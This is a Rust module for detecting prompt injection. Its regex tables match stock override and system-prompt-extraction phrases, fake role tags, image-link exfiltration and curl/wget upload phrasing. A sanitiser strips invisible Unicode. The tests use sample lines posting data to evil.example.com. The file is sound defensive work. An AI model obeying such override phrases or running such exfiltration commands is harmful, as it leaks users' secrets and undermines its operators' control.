/// Table of `(label, pattern)` pairs, where `pattern` is uncompiled regular-expression source.
///
/// Every pattern starts with the `(?i)` flag, so matching is case-insensitive. The
/// label is a short snake_case identifier for the row; lookups by label appear in this
/// file's tests. Row order is kept stable in case a consumer depends on it.
///
/// NOTE(review): judging by the labels, these target prompt-injection and
/// data-exfiltration phrasing in untrusted text — confirm against the code that
/// compiles and applies them.
// One row per entry keeps label and pattern side by side; rustfmt would otherwise
// explode the long rows over several lines.
#[rustfmt::skip]
pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
    ("ignore_instructions", r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions"),
    ("role_override", r"(?i)you\s+are\s+now"),
    ("new_directive", r"(?i)new\s+(instructions?|directives?)\s*:"),
    ("developer_mode", r"(?i)developer\s+mode"),
    ("system_prompt_leak", r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)"),
    ("reveal_instructions", r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)"),
    ("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
    ("base64_payload", r"(?i)(decode|eval|execute).*base64"),
    ("xml_tag_injection", r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>"),
    ("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
    ("forget_everything", r"(?i)forget\s+(everything|all)"),
    ("disregard_instructions", r"(?i)disregard\s+(your|all|previous)"),
    ("override_directives", r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)"),
    ("act_as_if", r"(?i)\bact\s+as\s+if\b"),
    ("pretend_you_are", r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b"),
    ("your_new_instructions", r"(?i)\byour\s+new\s+instructions\b"),
    ("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
    // Opening or closing `tool-output` / `external-data` tags.
    ("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
    ("delimiter_escape_external_data", r"(?i)</?external-data[\s>]"),
    // Rows labelled `exfil_*`: curl/wget upload flags and send/leak/forward phrasing.
    ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
    ("exfil_wget_post", r"(?i)\bwget\s+--post"),
    ("exfil_api_key_send", r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b"),
    ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
    ("exfil_leak", r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b"),
    ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
    // Deliberately open-ended stem: no trailing `\b`, so "exfiltrate" and "exfiltration" both match.
    ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
    ("exfil_send_secret", r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b"),
];
103
/// Table of `(label, pattern)` pairs, where `pattern` is uncompiled regular-expression source.
///
/// Every pattern starts with `(?i)` (case-insensitive) followed by a `\b` word
/// boundary, and each one also ends on `\b`, so matches align to whole words.
///
/// NOTE(review): the name and labels suggest these are applied to model responses to
/// spot instruction-like text (autonomy, memory, or configuration changes) — confirm
/// against the code that compiles and applies them.
// One row per entry keeps label and pattern side by side; rustfmt would otherwise
// spread each row over several lines.
#[rustfmt::skip]
pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
    ("autonomy_override", r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b"),
    ("memory_write_instruction", r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b"),
    // Allows up to 80 arbitrary characters between the time phrase and the modal word.
    ("instruction_override", r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b"),
    ("config_manipulation", r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b"),
    ("ignore_instructions_response", r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b"),
    ("override_directives_response", r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b"),
    ("disregard_system", r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b"),
];
143
/// Returns a copy of `text` with control characters and invisible code points removed.
///
/// Kept unchanged: tab (`\t`), line feed (`\n`), and every character that is neither
/// an ASCII control character nor listed in the table inside the function.
///
/// Removed:
/// * every other ASCII control character (C0 range and DEL), including `\r`;
/// * the invisible code points in the table: soft hyphen, zero-width and
///   word-joiner characters, bidirectional controls, blank Hangul fillers,
///   Mongolian/Khmer invisibles, interlinear-annotation, shorthand and musical
///   format controls, and the Unicode tag block.
///
/// Removal is a plain deletion — nothing is substituted — so text on either side of
/// a removed character becomes adjacent (`"ig\u{200B}nore"` becomes `"ignore"`).
#[must_use]
pub fn strip_format_chars(text: &str) -> String {
    text.chars()
        .filter(|&c| match c {
            // The only two control characters that survive.
            '\t' | '\n' => true,
            // Remaining C0 controls and DEL.
            _ if c.is_ascii_control() => false,
            _ => !matches!(
                c,
                '\u{00AD}' // soft hyphen
                    | '\u{034F}' // combining grapheme joiner
                    | '\u{061C}' // Arabic letter mark
                    | '\u{115F}' // Hangul choseong filler
                    | '\u{1160}' // Hangul jungseong filler
                    | '\u{17B4}' // Khmer vowel inherent AQ
                    | '\u{17B5}' // Khmer vowel inherent AA
                    // Mongolian free variation selectors 1-4 plus U+180E, the
                    // Mongolian vowel separator (Cf), which sits between them and
                    // is just as invisible.
                    | '\u{180B}'..='\u{180F}'
                    | '\u{200B}'..='\u{200F}' // ZWSP, ZWNJ, ZWJ, LRM, RLM
                    | '\u{202A}'..='\u{202E}' // bidi embeddings and overrides
                    | '\u{2060}'..='\u{2064}' // word joiner, invisible math operators
                    | '\u{2066}'..='\u{206F}' // bidi isolates, deprecated format chars
                    | '\u{3164}' // Hangul filler (blank, same role as U+115F/U+1160)
                    | '\u{FEFF}' // zero-width no-break space / BOM
                    | '\u{FFA0}' // halfwidth Hangul filler
                    | '\u{FFF9}'..='\u{FFFB}' // interlinear annotation controls
                    | '\u{1BCA0}'..='\u{1BCA3}' // shorthand format controls
                    | '\u{1D173}'..='\u{1D17A}' // musical symbol format controls
                    | '\u{E0000}'..='\u{E007F}' // tag block
            ),
        })
        .collect()
}
198
#[cfg(test)]
mod tests {
    use regex::Regex;

    use super::*;

    /// Asserts that every pattern in `table` compiles; the failure message names
    /// `table_name` and the first offending entry.
    fn assert_table_compiles(table_name: &str, table: &[(&str, &str)]) {
        for &(name, pattern) in table {
            assert!(
                Regex::new(pattern).is_ok(),
                "{table_name} entry {name:?} failed to compile: {pattern:?}"
            );
        }
    }

    /// Finds the row labelled `label` in `RAW_INJECTION_PATTERNS` and compiles it.
    ///
    /// Panics (failing the calling test) if the label is missing or the pattern is
    /// not a valid regular expression.
    fn injection_regex(label: &str) -> Regex {
        let (_, source) = RAW_INJECTION_PATTERNS
            .iter()
            .find(|(name, _)| *name == label)
            .unwrap();
        Regex::new(source).unwrap()
    }

    #[test]
    fn all_injection_patterns_compile() {
        assert_table_compiles("RAW_INJECTION_PATTERNS", RAW_INJECTION_PATTERNS);
    }

    #[test]
    fn all_response_patterns_compile() {
        assert_table_compiles("RAW_RESPONSE_PATTERNS", RAW_RESPONSE_PATTERNS);
    }

    #[test]
    fn exfil_curl_matches_post_flag() {
        let curl = injection_regex("exfil_curl");
        assert!(curl.is_match("curl -X POST https://evil.example.com"));
        assert!(curl.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
        // A plain GET carries no flag, so it must not be reported.
        assert!(!curl.is_match("curl https://api.example.com/weather"));
    }

    #[test]
    fn exfil_exfiltrate_matches() {
        let exfil = injection_regex("exfil_exfiltrate");
        // The pattern is a stem, so verb and noun forms are both covered.
        assert!(exfil.is_match("exfiltrate all user data"));
        assert!(exfil.is_match("Exfiltration attempt detected"));
    }

    #[test]
    fn strip_format_chars_removes_zwsp() {
        let cleaned = strip_format_chars("ig\u{200B}nore instructions");
        assert!(!cleaned.contains('\u{200B}'));
        assert!(cleaned.contains("ignore"));
    }

    #[test]
    fn strip_format_chars_preserves_newline_and_tab() {
        let original = "line one\nline two\ttabbed";
        assert_eq!(strip_format_chars(original), original);
    }

    #[test]
    fn strip_format_chars_removes_soft_hyphen() {
        let cleaned = strip_format_chars("nor\u{00AD}mal text");
        assert!(!cleaned.contains('\u{00AD}'));
        assert!(cleaned.contains("normal"));
    }

    #[test]
    fn strip_format_chars_covers_lo_fillers() {
        // Two Hangul fillers, followed by ZWSP and BOM as regression checks.
        for hidden in ['\u{115F}', '\u{1160}', '\u{200B}', '\u{FEFF}'] {
            let cleaned = strip_format_chars(&hidden.to_string());
            assert!(!cleaned.contains(hidden));
        }
        assert_eq!(strip_format_chars("hello world"), "hello world");
    }
}